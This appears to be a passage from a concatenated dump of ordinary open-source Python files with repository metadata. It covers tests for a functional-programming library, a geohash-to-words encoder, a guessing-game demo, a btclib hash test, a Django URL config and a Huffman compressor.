def test_no_match_statements_provided(self):
value = unittest.mock.Mock()
with self.assertRaises(rail.UnmatchedValueError) as context:
rail.match_length()(value)
self.assertEqual(value, context.exception.value)
def test_value_unmatched_by_all_match_statements(self):
value = unittest.mock.Mock()
value.__len__ = unittest.mock.Mock(return_value=2)
with self.assertRaises(rail.UnmatchedValueError) as context:
match = rail.match_length(
(rail.eq(8), lambda _: unittest.mock.Mock()),
(rail.gt(3), lambda _: unittest.mock.Mock())
)
match(value)
self.assertEqual(value, context.exception.value)
def test_value_matches_single_match_statement(self):
expected_value = unittest.mock.Mock()
match = rail.match_length(
(rail.lt(0), lambda _: unittest.mock.Mock()),
(rail.eq(0), lambda _: expected_value),
(rail.gt(0), lambda _: unittest.mock.Mock())
)
value = unittest.mock.Mock()
value.__len__ = unittest.mock.Mock(return_value=0)
self.assertEqual(expected_value, match(value))
def test_value_matches_multiple_match_statements(self):
expected_value = unittest.mock.Mock()
match = rail.match_length(
(rail.lt(0), lambda _: unittest.mock.Mock()),
(rail.ge(0), lambda _: expected_value),
(rail.eq(0), lambda _: unittest.mock.Mock())
)
value = unittest.mock.Mock()
value.__len__ = unittest.mock.Mock(return_value=0)
self.assertEqual(expected_value, match(value))
class TestPartial(unittest.TestCase):
def test_func_with_no_args(self):
@rail.partial
def func():
return 'value'
self.assertEqual('value', func())
def test_func_with_single_arg(self):
@rail.partial
def func(arg):
return arg
value = unittest.mock.Mock()
self.assertEqual(value, func(value))
def test_func_with_multiple_args(self):
@rail.partial
def func(arg1, arg2, arg3):
return arg1, arg2, arg3
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual((val1, val2, val3), func(val1, val2, val3))
self.assertEqual((val1, val2, val3), func(val1)(val2, val3))
self.assertEqual((val1, val2, val3), func(val1, val2)(val3))
self.assertEqual((val1, val2, val3), func(val1)(val2)(val3))
def test_func_with_arguments_applied_out_of_order(self):
@rail.partial
def func(arg1, arg2, arg3):
return arg1, arg2, arg3
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual((val1, val2, val3), func(arg2=val2)(val1, val3))
self.assertEqual((val1, val2, val3), func(arg3=val3)(val1, val2))
self.assertEqual(
(val1, val2, val3), func(arg2=val2, arg3=val3)(val1)
)
self.assertEqual(
(val1, val2, val3), func(arg3=val3)(arg2=val2)(val1)
)
self.assertEqual((val1, val2, val3), func(val1, arg3=val3)(val2))
def test_func_with_default_arguments(self):
@rail.partial
def func(arg1, arg2, arg3='val3', arg4='val4'):
return arg1, arg2, arg3, arg4
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
val4 = unittest.mock.Mock()
self.assertEqual((val1, val2, 'val3', 'val4'), func(val1, val2))
self.assertEqual((val1, val2, 'val3', 'val4'), func(val1)(val2))
self.assertEqual(
(val1, val2, val3, val4), func(val1, val2, val3, val4)
)
self.assertEqual(
(val1, val2, val3, val4), func(val1)(val2, val3, val4)
)
self.assertEqual(
(val1, val2, val3, val4), func(val1, arg3=val3)(val2, val4)
)
def test_func_with_default_arguments_only(self):
@rail.partial
def func(arg1='val1', arg2='val2'):
return arg1, arg2
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
self.assertEqual(('val1', 'val2'), func())
self.assertEqual((val1, 'val2'), func(val1))
self.assertEqual(('val1', val2), func(arg2=val2))
self.assertEqual((val1, val2), func(val1, val2))
def test_func_with_argument_list(self):
@rail.partial
def func(arg1, arg2, *args):
return (arg1, arg2) + args
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
val4 = unittest.mock.Mock()
self.assertEqual((val1, val2), func(val1, val2))
self.assertEqual((val1, val2), func(val1)(val2))
self.assertEqual(
(val1, val2, val3, val4), func(val1, val2, val3, val4)
)
self.assertEqual(
(val1, val2, val3, val4), func(val1)(val2, val3, val4)
)
def test_func_with_argument_list_only(self):
@rail.partial
def func(*args):
return args
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
self.assertEqual((), func())
self.assertEqual((val1,), func(val1))
self.assertEqual((val1, val2), func(val1, val2))
def test_func_with_keyword_arguments(self):
@rail.partial
def func(arg1, arg2, **kwargs):
return (arg1, arg2) + ((kwargs,) if kwargs else ())
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
val4 = unittest.mock.Mock()
self.assertEqual((val1, val2), func(val1, val2))
self.assertEqual((val1, val2), func(val1)(val2))
self.assertEqual(
(val1, val2, {'val3': val3, 'val4': val4}),
func(val1, val2, val3=val3, val4=val4)
)
self.assertEqual(
(val1, val2, {'val3': val3, 'val4': val4}),
func(val1, val3=val3)(val2, val4=val4)
)
def test_func_with_keyword_arguments_only(self):
@rail.partial
def func(**kwargs):
return kwargs
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
self.assertEqual({}, func())
self.assertEqual({'arg1': val1}, func(arg1=val1))
self.assertEqual(
{'arg1': val1, 'arg2': val2}, func(arg1=val1, arg2=val2)
)
def test_docstring_preserved(self):
@rail.partial
def func1(arg1, arg2):
"""Docstring for func"""
return arg1, arg2
self.assertEqual('Docstring for func', func1.__doc__)
func2 = func1(unittest.mock.Mock())
self.assertEqual('Docstring for func', func2.__doc__)
class TestCompose(unittest.TestCase):
def test_compose_with_no_funcs(self):
func = rail.compose()
value = unittest.mock.Mock()
self.assertEqual(value, func(value))
def test_compose_with_no_exception(self):
expected_value = unittest.mock.Mock()
func = rail.compose(
lambda value: expected_value
)
self.assertEqual(expected_value, func(unittest.mock.Mock()))
def test_compose_with_exception(self):
with self.assertRaises(ValueError) as context:
func = rail.compose(
lambda value: rail.raise_(ValueError('exception'))
)
func(unittest.mock.Mock())
self.assertEqual('exception', str(context.exception))
def test_compose_with_multiple_funcs(self):
return_value1 = unittest.mock.Mock()
return_value2 = unittest.mock.Mock()
return_value3 = unittest.mock.Mock()
func1 = unittest.mock.Mock(return_value=return_value1)
func2 = unittest.mock.Mock(return_value=return_value2)
func3 = unittest.mock.Mock(return_value=return_value3)
func = rail.compose(
func1,
func2,
func3
)
value = unittest.mock.Mock()
self.assertEqual(return_value3, func(value))
func1.assert_called_once_with(value)
func2.assert_called_once_with(return_value1)
func3.assert_called_once_with(return_value2)
class TestPipe(unittest.TestCase):
def test_pipe(self):
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual(
(val1, val2, val3),
rail.pipe(
(val1,),
lambda val: val + (val2,),
lambda val: val + (val3,)
)
)
def test_use_pipe_to_create_scope(self):
val1 = unittest.mock.Mock()
val2 = unittest.mock.Mock()
val3 = unittest.mock.Mock()
self.assertEqual(
(val1, val2, val3),
rail.pipe(
(val1,),
lambda arg1: rail.pipe(
(val2,),
lambda arg2: arg1 + arg2,
lambda arg: arg + (val3,)
)
)
)
class TestTee(unittest.TestCase):
def test_with_multiple_funcs(self):
input = unittest.mock.Mock()
func1 = unittest.mock.Mock(return_value=unittest.mock.Mock())
func2 = unittest.mock.Mock(return_value=unittest.mock.Mock())
func3 = unittest.mock.Mock()
self.assertEqual(
input,
rail.pipe(input, rail.tee(func1, func2, func3))
)
func1.assert_called_once_with(input)
func2.assert_called_once_with(func1.return_value)
func3.assert_called_once_with(func2.return_value)
class TestCallWith(unittest.TestCase):
def test_calls_function_with_value(self):
value = unittest.mock.Mock()
func = unittest.mock.Mock()
rail.call_with(value, func)
func.assert_called_once_with(value)
def test_partial_application(self):
value = unittest.mock.Mock()
func = unittest.mock.Mock()
rail.pipe(func, rail.call_with(value))
def test_returns_func_return_value(self):
return_value = unittest.mock.Mock()
func = unittest.mock.Mock(return_value=return_value)
self.assertEqual(
return_value, rail.call_with(unittest.mock.Mock(), func)
)
class TestLt(unittest.TestCase):
def test_pipe_returns_true(self):
self.assertTrue(rail.pipe(5, rail.lt(7)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(8, rail.lt(1)))
class TestLe(unittest.TestCase):
def test_pipe_returns_true_for_different_values(self):
self.assertTrue(rail.pipe(5, rail.le(7)))
def test_pipe_returns_true_for_equal_values(self):
self.assertTrue(rail.pipe(5, rail.le(5)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(8, rail.le(1)))
class TestEq(unittest.TestCase):
def test_pipe_returns_true(self):
value = unittest.mock.Mock()
self.assertTrue(rail.pipe(value, rail.eq(value)))
def test_pipe_returns_false(self):
value1 = unittest.mock.Mock()
value2 = unittest.mock.Mock()
self.assertFalse(rail.pipe(value1, rail.eq(value2)))
class TestNe(unittest.TestCase):
def test_pipe_returns_true(self):
value1 = unittest.mock.Mock()
value2 = unittest.mock.Mock()
self.assertTrue(rail.pipe(value1, rail.ne(value2)))
def test_pipe_returns_false(self):
value = unittest.mock.Mock()
self.assertFalse(rail.pipe(value, rail.ne(value)))
class TestGt(unittest.TestCase):
def test_pipe_returns_true(self):
self.assertTrue(rail.pipe(4, rail.gt(0)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(13, rail.gt(15)))
class TestGe(unittest.TestCase):
def test_pipe_returns_true_for_different_values(self):
self.assertTrue(rail.pipe(6, rail.ge(2)))
def test_pipe_returns_true_for_equal_values(self):
self.assertTrue(rail.pipe(4, rail.ge(4)))
def test_pipe_returns_false(self):
self.assertFalse(rail.pipe(6, rail.ge(9)))
class TestTrack(unittest.TestCase):
def test_compose_with_existing_func(self):
return_value1 = unittest.mock.Mock()
return_value2 = unittest.mock.Mock()
return_value3 = unittest.mock.Mock()
func1 = unittest.mock.Mock(return_value=return_value1)
func2 = unittest.mock.Mock(return_value=return_value2)
func3 = unittest.mock.Mock(return_value=return_value3)
func = rail.Track().compose(
func1
).compose(
func2,
func3
)
value = unittest.mock.Mock()
self.assertEqual(return_value3, func(value))
func1.assert_called_once_with(value)
func2.assert_called_once_with(return_value1)
func3.assert_called_once_with(return_value2)
def test_tee_called_consecutively(self):
func1 = unittest.mock.Mock()
func2 = unittest.mock.Mock()
func = rail.Track().tee(
func1
).tee(
func2
)
value = unittest.mock.Mock()
self.assertEqual(value, func(value))
func1.assert_called_once_with(value)
func2.assert_called_once_with(value)
def test_fold_with_no_exception(self):
expected_value = unittest.mock.Mock()
func = rail.Track().compose(
lambda value: unittest.mock.Mock()
).fold(
lambda value: expected_value,
lambda exception: self.fail()
)
self.assertEqual(expected_value, func(unittest.mock.Mock()))
def test_fold_with_exception(self):
expected_exception = KeyError('key')
actual_exception = rail.pipe(
unittest.mock.Mock(),
rail.Track().compose(
lambda _: rail.raise_(expected_exception)
).fold(
lambda _: self.fail(),
rail.identity
)
)
self.assertEqual(expected_exception, actual_exception)
def test_fold_traceback_with_exception(self):
exception = KeyError('key')
func = rail.Track().compose(
lambda _: rail.raise_(exception)
)
try:
func(unittest.mock.Mock())
except KeyError:
expected_exc_info = sys.exc_info()
try:
rail.pipe(
unittest.mock.Mock(),
func.fold(
lambda _: self.fail(),
rail.raise_
)
)
except KeyError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
def test_handle_with_multiple_funcs(self):
expected_exception = ValueError('value')
func = rail.Track().compose(
lambda value: rail.raise_(ValueError('value'))
).handle(
lambda exception: unittest.mock.Mock(),
lambda exception: expected_exception
)
self.assertEqual(expected_exception, func(unittest.mock.Mock()))
def test_handle_with_no_exception(self):
expected_value = unittest.mock.Mock()
func = rail.Track().compose(
lambda value: expected_value
).handle(
lambda exception: self.fail()
)
self.assertEqual(expected_value, func(unittest.mock.Mock()))
def test_handle_with_exception(self):
expected_exception = KeyError('key')
actual_exception = rail.pipe(
unittest.mock.Mock(),
rail.Track().compose(
lambda _: rail.raise_(expected_exception)
).handle(
rail.identity
)
)
self.assertEqual(expected_exception, actual_exception)
def test_handle_traceback_with_exception(self):
exception = KeyError('key')
func = rail.Track().compose(
lambda _: rail.raise_(exception)
)
try:
func(unittest.mock.Mock())
except KeyError:
expected_exc_info = sys.exc_info()
try:
rail.pipe(
unittest.mock.Mock(),
func.handle(
rail.raise_
)
)
except KeyError:
actual_exc_info = sys.exc_info()
self.assertEqual(expected_exc_info[0], actual_exc_info[0])
self.assertEqual(expected_exc_info[1], actual_exc_info[1])
expected_tb = traceback.format_tb(expected_exc_info[2])
actual_tb = traceback.format_tb(actual_exc_info[2])
self.assertEqual(expected_tb, actual_tb[-len(expected_tb):])
if __name__ == '__main__':
unittest.main()
|
rob-earwaker/rail
|
test_rail.py
|
Python
|
mit
| 23,712
|
"""
thisplace: Human-readable addresses for every 3x3m square on the earth's surface.
The simplest way to use this module are the `four_words` and `decode`
functions. For more see `WordHasher`.
"""
import random
import geohash
def get_words(fname):
lines = open(fname)
words = []
for word in lines:
words.append(word.strip())
lines.close()
random.seed(634634)
random.shuffle(words)
words = words[:2**15]
assert len(words) == len(set(words))
return words
# These read like alien races from a sci-fi book
GOOGLE_WORDLIST = get_words("words/google-ngram-list")
# shorter list with only 4096 words
GOOGLE_4096WORDS = get_words("words/google-ngram-list-4096")
# current best list for the three word hash
WORDNET_LEMMAS = get_words("words/wordnet-list")
# Human friendly word list, taken directly from humanhash project
# these are the best words but there are not enough of
# them so we only use them for the six word hash
HUMAN_WORDLIST = (
'ack', 'alabama', 'alanine', 'alaska', 'alpha', 'angel', 'apart', 'april',
'arizona', 'arkansas', 'artist', 'asparagus', 'aspen', 'august', 'autumn',
'avocado', 'bacon', 'bakerloo', 'batman', 'beer', 'berlin', 'beryllium',
'black', 'blossom', 'blue', 'bluebird', 'bravo', 'bulldog', 'burger',
'butter', 'california', 'carbon', 'cardinal', 'carolina', 'carpet', 'cat',
'ceiling', 'charlie', 'chicken', 'coffee', 'cola', 'cold', 'colorado',
'comet', 'connecticut', 'crazy', 'cup', 'dakota', 'december', 'delaware',
'delta', 'diet', 'don', 'double', 'early', 'earth', 'east', 'echo',
'edward', 'eight', 'eighteen', 'eleven', 'emma', 'enemy', 'equal',
'failed', 'fanta', 'fifteen', 'fillet', 'finch', 'fish', 'five', 'fix',
'floor', 'florida', 'football', 'four', 'fourteen', 'foxtrot', 'freddie',
'friend', 'fruit', 'gee', 'georgia', 'glucose', 'golf', 'green', 'grey',
'hamper', 'happy', 'harry', 'hawaii', 'helium', 'high', 'hot', 'hotel',
'hydrogen', 'idaho', 'illinois', 'india', 'indigo', 'ink', 'iowa',
'island', 'item', 'jersey', 'jig', 'johnny', 'juliet', 'july', 'jupiter',
'kansas', 'kentucky', 'kilo', 'king', 'kitten', 'lactose', 'lake', 'lamp',
'lemon', 'leopard', 'lima', 'lion', 'lithium', 'london', 'louisiana',
'low', 'magazine', 'magnesium', 'maine', 'mango', 'march', 'mars',
'maryland', 'massachusetts', 'may', 'mexico', 'michigan', 'mike',
'minnesota', 'mirror', 'mississippi', 'missouri', 'mobile', 'mockingbird',
'monkey', 'montana', 'moon', 'mountain', 'muppet', 'music', 'nebraska',
'neptune', 'network', 'nevada', 'nine', 'nineteen', 'nitrogen', 'north',
'november', 'nuts', 'october', 'ohio', 'oklahoma', 'one', 'orange',
'oranges', 'oregon', 'oscar', 'oven', 'oxygen', 'papa', 'paris', 'pasta',
'pennsylvania', 'pip', 'pizza', 'pluto', 'potato', 'princess', 'purple',
'quebec', 'queen', 'quiet', 'red', 'river', 'robert', 'robin', 'romeo',
'rugby', 'sad', 'salami', 'saturn', 'september', 'seven', 'seventeen',
'shade', 'sierra', 'single', 'sink', 'six', 'sixteen', 'skylark', 'snake',
'social', 'sodium', 'solar', 'south', 'spaghetti', 'speaker', 'spring',
'stairway', 'steak', 'stream', 'summer', 'sweet', 'table', 'tango', 'ten',
'tennessee', 'tennis', 'texas', 'thirteen', 'three', 'timing', 'triple',
'twelve', 'twenty', 'two', 'uncle', 'undress', 'uniform', 'uranus', 'utah',
'vegan', 'venus', 'vermont', 'victor', 'video', 'violet', 'virginia',
'washington', 'west', 'whiskey', 'white', 'william', 'winner', 'winter',
'wisconsin', 'wolfram', 'wyoming', 'xray', 'yankee', 'yellow', 'zebra',
'zulu')
class WordHasher(object):
def __init__(self):
"""Convert latitude and longitudes into human readable strings."""
self._symbols = "0123456789bcdefghjkmnpqrstuvwxyz"
self._decode_symbols = dict((ch, i) for (i, ch) in enumerate(self._symbols))
self._encode_symbols = dict((i, ch) for (i, ch) in enumerate(self._symbols))
self.six_wordlist = HUMAN_WORDLIST
self.four_wordlist = GOOGLE_4096WORDS
self.three_wordlist = GOOGLE_WORDLIST
def three_words(self, lat_long):
"""Convert coordinate to a combination of three words
The coordinate is defined by latitude and longitude
in degrees.
"""
lat, lon = lat_long
gh = geohash.encode(lat, lon, 9)
words = "-".join(self.three_wordlist[p] for p in self.to_rugbits(self.geo_to_int(gh)))
return words
def four_words(self, lat_long):
"""Convert coordinate to a combination of four words
The coordinate is defined by latitude and longitude
in degrees.
"""
lat, lon = lat_long
gh = geohash.encode(lat, lon, 9)
words = "-".join(self.four_wordlist[p] for p in self.to_quads(self.pad(gh)))
return words
def six_words(self, lat_long):
"""Convert coordinate to a combination of six words
The coordinate is defined by latitude and longitude
in degrees.
With six words the word list contains only words
which are short, easy to pronounce and easy distinguish.
"""
lat, lon = lat_long
gh = geohash.encode(lat, lon, 9)
words = "-".join(self.six_wordlist[p] for p in self.to_bytes(self.pad(gh)))
return words
def decode(self, words):
"""Decode `words` to latitude and longitude"""
words = words.split("-")
if len(words) == 3:
i = self.rugbits_to_int([self.three_wordlist.index(w) for w in words])
elif len(words) == 4:
i = self.quads_to_int([self.four_wordlist.index(w) for w in words])
i = self.unpad(i)
elif len(words) == 6:
i = self.bytes_to_int([self.six_wordlist.index(w) for w in words])
i = self.unpad(i)
else:
raise RuntimeError("Do not know how to decode a set of %i words."%(len(words)))
geo_hash = self.int_to_geo(i)
return geohash.decode(geo_hash)
def geo_to_int(self, geo_hash):
"""Decode `geo_hash` to an integer"""
base = len(self._symbols)
number = 0
for symbol in geo_hash:
number = number*base + self._decode_symbols[symbol]
return number
def int_to_geo(self, integer):
"""Encode `integer` to a geo hash"""
base = len(self._symbols)
symbols = []
while integer > 0:
remainder = integer % base
integer //= base
symbols.append(self._encode_symbols[remainder])
return ''.join(reversed(symbols))
def pad(self, geo_hash):
"""Pad nine character `geo_hash` to 48bit integer"""
assert len(geo_hash) == 9
return self.geo_to_int(geo_hash) * 8
def unpad(self, integer):
"""Remove 3bit of padding to get 45bit geo hash"""
return integer>>3
def to_bytes(self, integer):
"""Convert a 48bit `integer` to a list of 6bytes"""
bytes = [integer & 0b11111111]
for n in range(1,6):
div = 2**(n*8)
bytes.append((integer//div) & 0b11111111)
bytes.reverse()
return bytes
def bytes_to_int(self, bytes):
"""Convert a list of 6`bytes` to an integer"""
assert len(bytes) == 6
N = 0
bytes.reverse()
for n,b in enumerate(bytes):
N += b * (2**(8*(n)))
return N
def to_quads(self, integer):
"""Convert a 48bit `integer` to a list of 4 quads"""
quads = [integer & 0b111111111111]
for n in range(1,4):
div = 2**(n*12)
quads.append((integer//div) & 0b111111111111)
quads.reverse()
return quads
def quads_to_int(self, quads):
"""Convert a list of four 12bit values to an integer"""
assert len(quads) == 4
N = 0
quads.reverse()
for n,b in enumerate(quads):
N += b * (2**(12*(n)))
return N
def to_rugbits(self, integer):
"""Convert a 45bit `integer` to a list of 3rugbits
A rugbit is like a byte but with 15bits instead of eight.
"""
fifteen_bits = 0b111111111111111
rugbits = [(integer//(2**30)) & fifteen_bits,
(integer//(2**15)) & fifteen_bits,
integer & fifteen_bits]
return rugbits
def rugbits_to_int(self, rugbits):
"""Convert a list of `rugbits` to an integer"""
assert len(rugbits) == 3
return (rugbits[0] *(2**30)) + (rugbits[1] *(2**15)) + (rugbits[2])
DEFAULT_HASHER = WordHasher()
three_words = DEFAULT_HASHER.three_words
four_words = DEFAULT_HASHER.four_words
six_words = DEFAULT_HASHER.six_words
decode = DEFAULT_HASHER.decode
|
Placeware/ThisPlace
|
thisplace.py
|
Python
|
mit
| 8,967
|
#!/usr/bin/env python3
# vim: tw=76
import kxg
import random
import pyglet
LOWER_BOUND, UPPER_BOUND = 0, 5000
class World(kxg.World):
"""
Keep track of the secret number, the range of numbers that haven't been
eliminated yet, and the winner (if there is one).
"""
def __init__(self):
super().__init__()
self.number = 0
self.lower_bound = 0
self.upper_bound = 0
self.winner = 0
class Referee(kxg.Referee):
"""
Pick the secret number.
"""
def on_start_game(self, num_players):
number = random.randint(LOWER_BOUND + 1, UPPER_BOUND - 1)
self >> PickNumber(number, LOWER_BOUND, UPPER_BOUND)
class PickNumber(kxg.Message):
"""
Pick the secret number and communicate that choice to all the clients.
"""
def __init__(self, number, lower_bound, upper_bound):
self.number = number
self.lower_bound = lower_bound
self.upper_bound = upper_bound
def on_check(self, world):
if world.number:
raise kxg.MessageCheck("number already picked")
def on_execute(self, world):
world.number = self.number
world.lower_bound = self.lower_bound
world.upper_bound = self.upper_bound
class GuessNumber(kxg.Message):
"""
Make a guess on behalf of the given player. If the guess is
right, that player wins the game. If the guess is wrong, the
range of numbers that the secret number could be is narrowed
accordingly.
"""
def __init__(self, player, guess):
self.player = player
self.guess = guess
def on_check(self, world):
pass
def on_execute(self, world):
if self.guess == world.number:
world.winner = self.player
world.end_game()
elif self.guess < world.number:
world.lower_bound = max(self.guess, world.lower_bound)
elif self.guess > world.number:
world.upper_bound = min(self.guess, world.upper_bound)
class Gui:
"""
Manage GUI objects like the window, which exist before and after the game
itself.
"""
def __init__(self):
self.width, self.height = 600, 400
self.window = pyglet.window.Window()
self.window.set_size(self.width, self.height)
self.window.set_visible(True)
self.label = pyglet.text.Label(
"",
color=(255, 255, 255, 255),
font_name='Deja Vu Sans', font_size=32,
x=self.width//2, y=self.height//2,
anchor_x='center', anchor_y='center',
)
def on_refresh_gui(self):
self.window.clear()
self.label.draw()
class GuiActor(kxg.Actor):
"""
Show the players the range of numbers that haven't been eliminated yet,
and allow the player to guess what the number is.
"""
def __init__(self):
super().__init__()
self.guess = None
self.prompt = "{0.lower_bound} < {1} < {0.upper_bound}"
def on_setup_gui(self, gui):
self.gui = gui
self.gui.window.set_handlers(self)
def on_draw(self):
self.gui.on_refresh_gui()
def on_mouse_scroll(self, x, y, dx, dy):
# If the user scrolls the mouse wheel, update the guess accordingly.
if self.guess is None:
if dy < 0:
self.guess = self.world.upper_bound
else:
self.guess = self.world.lower_bound
self.guess = sorted([
self.world.lower_bound,
self.guess + dy,
self.world.upper_bound,
])[1]
self.on_update_prompt()
def on_key_press(self, symbol, modifiers):
# If the user types a number, add that digit to the guess.
try:
digit = int(chr(symbol))
self.guess = 10 * (self.guess or 0) + digit
except ValueError:
pass
# If the user hits backspace, remove the last digit from the guess.
if symbol == pyglet.window.key.BACKSPACE:
if self.guess is not None:
guess_str = str(self.guess)[:-1]
self.guess = int(guess_str) if guess_str else None
# If the user hits enter, guess the current number.
if symbol == pyglet.window.key.ENTER:
if self.guess:
self >> GuessNumber(self.id, self.guess)
self.guess = None
self.on_update_prompt()
@kxg.subscribe_to_message(PickNumber)
@kxg.subscribe_to_message(GuessNumber)
def on_update_prompt(self, message=None):
guess_str = '???' if self.guess is None else str(self.guess)
self.gui.label.text = self.prompt.format(self.world, guess_str)
def on_finish_game(self):
self.gui.window.pop_handlers()
if self.world.winner == self.id:
self.gui.label.text = "You won!"
else:
self.gui.label.text = "You lost!"
class AiActor(kxg.Actor):
"""
Wait a random amount of time, then guess a random number within the
remaining range.
"""
def __init__(self):
super().__init__()
self.reset_timer()
def on_update_game(self, dt):
self.timer -= dt
if self.timer < 0:
lower_bound = self.world.lower_bound + 1
upper_bound = self.world.upper_bound - 1
guess = random.randint(lower_bound, upper_bound)
self >> GuessNumber(self.id, guess)
self.reset_timer()
def reset_timer(self):
self.timer = random.uniform(1, 3)
if __name__ == '__main__':
kxg.quickstart.main(World, Referee, Gui, GuiActor, AiActor)
|
kxgames/kxg
|
demos/guess_my_number.py
|
Python
|
mit
| 5,672
|
#!/usr/bin/env python3
# Copyright (C) 2017-2021 The btclib developers
#
# This file is part of btclib. It is subject to the license terms in the
# LICENSE file found in the top-level directory of this distribution.
#
# No part of btclib including this file, may be copied, modified, propagated,
# or distributed except according to the terms contained in the LICENSE file.
"Tests for the `btclib.hashes` module."
from btclib.hashes import hash160, hash256
from tests.test_to_key import (
net_unaware_compressed_pub_keys,
net_unaware_uncompressed_pub_keys,
plain_prv_keys,
)
def test_hash160_hash256() -> None:
test_vectors = (
plain_prv_keys
+ net_unaware_compressed_pub_keys
+ net_unaware_uncompressed_pub_keys
)
for hexstring in test_vectors:
hash160(hexstring)
hash256(hexstring)
# def test_fingerprint() -> None:
#
# seed = "bfc4cbaad0ff131aa97fa30a48d09ae7df914bcc083af1e07793cd0a7c61a03f65d622848209ad3366a419f4718a80ec9037df107d8d12c19b83202de00a40ad"
# xprv = rootxprv_from_seed(seed)
# pf = fingerprint(xprv) # xprv is automatically converted to xpub
# child_key = derive(xprv, 0x80000000)
# pf2 = BIP32KeyData.b58decode(child_key).parent_fingerprint
# assert pf == pf2
|
fametrano/BitcoinBlockchainTechnology
|
tests/test_hashes.py
|
Python
|
mit
| 1,276
|
from django.conf.urls import include, url
from django.contrib import admin
from Poller import views
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^(?P<pk>\d+)/$', views.DetailView.as_view(), name='detail'),
url(r'^(?P<pk>\d+)/results/$', views.ResultsView.as_view(), name='results'),
url(r'^(?P<question_id>\d+)/vote/$', views.vote, name='vote'),
]
|
zzeleznick/zDjango
|
Poller/urls.py
|
Python
|
mit
| 396
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import os
import marshal
import cPickle
import array
class HuffmanNode(object):
recurPrint = False
def __init__(self, ch=None, fq=None, lnode=None, rnode=None, parent=None):
self.L = lnode
self.R = rnode
self.p = parent
self.c = ch
self.fq = fq
def __repr__(self):
if HuffmanNode.recurPrint:
lnode = self.L if self.L else '#'
rnode = self.R if self.R else '#'
return ''.join( ('(%s:%d)'%(self.c, self.fq), str(lnode), str(rnode) ) )
else:
return '(%s:%d)'%(self.c, self.fq)
def __cmp__(self, other):
if not isinstance(other, HuffmanNode):
return super(HuffmanNode, self).__cmp__(other)
return cmp(self.fq, other.fq)
def _pop_first_two_nodes(nodes):
if len(nodes)>1:
first=nodes.pop(0)
second=nodes.pop(0)
return first, second
else:
#print "[popFirstTwoNodes] nodes's length <= 1"
return nodes[0], None
def _build_tree(nodes):
nodes.sort()
while(True):
first, second = _pop_first_two_nodes(nodes)
if not second:
return first
parent = HuffmanNode(lnode=first, rnode=second, fq=first.fq+second.fq)
first.p = parent
second.p = parent
nodes.insert(0, parent)
nodes.sort()
def _gen_huffman_code(node, dict_codes, buffer_stack=[]):
if not node.L and not node.R:
dict_codes[node.c] = ''.join(buffer_stack)
return
buffer_stack.append('0')
_gen_huffman_code(node.L, dict_codes, buffer_stack)
buffer_stack.pop()
buffer_stack.append('1')
_gen_huffman_code(node.R, dict_codes, buffer_stack)
buffer_stack.pop()
def _cal_freq(long_str):
from collections import defaultdict
d = defaultdict(int)
for c in long_str:
d[c] += 1
return d
MAX_BITS = 8
class Encoder(object):
def __init__(self, filename_or_long_str=None):
if filename_or_long_str:
if os.path.exists(filename_or_long_str):
self.encode(filename_or_long_str)
else:
#print '[Encoder] take \'%s\' as a string to be encoded.'\
# % filename_or_long_str
self.long_str = filename_or_long_str
def __get_long_str(self):
return self._long_str
def __set_long_str(self, s):
self._long_str = s
if s:
self.root = self._get_tree_root()
self.code_map = self._get_code_map()
self.array_codes, self.code_length = self._encode()
long_str = property(__get_long_str, __set_long_str)
def _get_tree_root(self):
d = _cal_freq(self.long_str)
return _build_tree(
[HuffmanNode(ch=ch, fq=int(fq)) for ch, fq in d.iteritems()]
)
def _get_code_map(self):
a_dict={}
_gen_huffman_code(self.root, a_dict)
return a_dict
def _encode(self):
array_codes = array.array('B')
code_length = 0
buff, length = 0, 0
for ch in self.long_str:
code = self.code_map[ch]
for bit in list(code):
if bit=='1':
buff = (buff << 1) | 0x01
else: # bit == '0'
buff = (buff << 1)
length += 1
if length == MAX_BITS:
array_codes.extend([buff])
buff, length = 0, 0
code_length += len(code)
if length != 0:
array_codes.extend([buff << (MAX_BITS-length)])
return array_codes, code_length
def encode(self, filename):
fp = open(filename, 'rb')
self.long_str = fp.read()
fp.close()
def write(self, filename):
if self._long_str:
fcompressed = open(filename, 'wb')
marshal.dump(
(cPickle.dumps(self.root), self.code_length, self.array_codes),
fcompressed)
fcompressed.close()
else:
print "You haven't set 'long_str' attribute."
class Decoder(object):
def __init__(self, filename_or_raw_str=None):
if filename_or_raw_str:
if os.path.exists(filename_or_raw_str):
filename = filename_or_raw_str
self.read(filename)
else:
print '[Decoder] take \'%s\' as raw string' % filename_or_raw_str
raw_string = filename_or_raw_str
unpickled_root, length, array_codes = marshal.loads(raw_string)
self.root = cPickle.loads(unpickled_root)
self.code_length = length
self.array_codes = array.array('B', array_codes)
def _decode(self):
string_buf = []
total_length = 0
node = self.root
for code in self.array_codes:
buf_length = 0
while (buf_length < MAX_BITS and total_length != self.code_length):
buf_length += 1
total_length += 1
if code >> (MAX_BITS - buf_length) & 1:
node = node.R
if node.c:
string_buf.append(node.c)
node = self.root
else:
node = node.L
if node.c:
string_buf.append(node.c)
node = self.root
return ''.join(string_buf)
def read(self, filename):
fp = open(filename, 'rb')
unpickled_root, length, array_codes = marshal.load(fp)
self.root = cPickle.loads(unpickled_root)
self.code_length = length
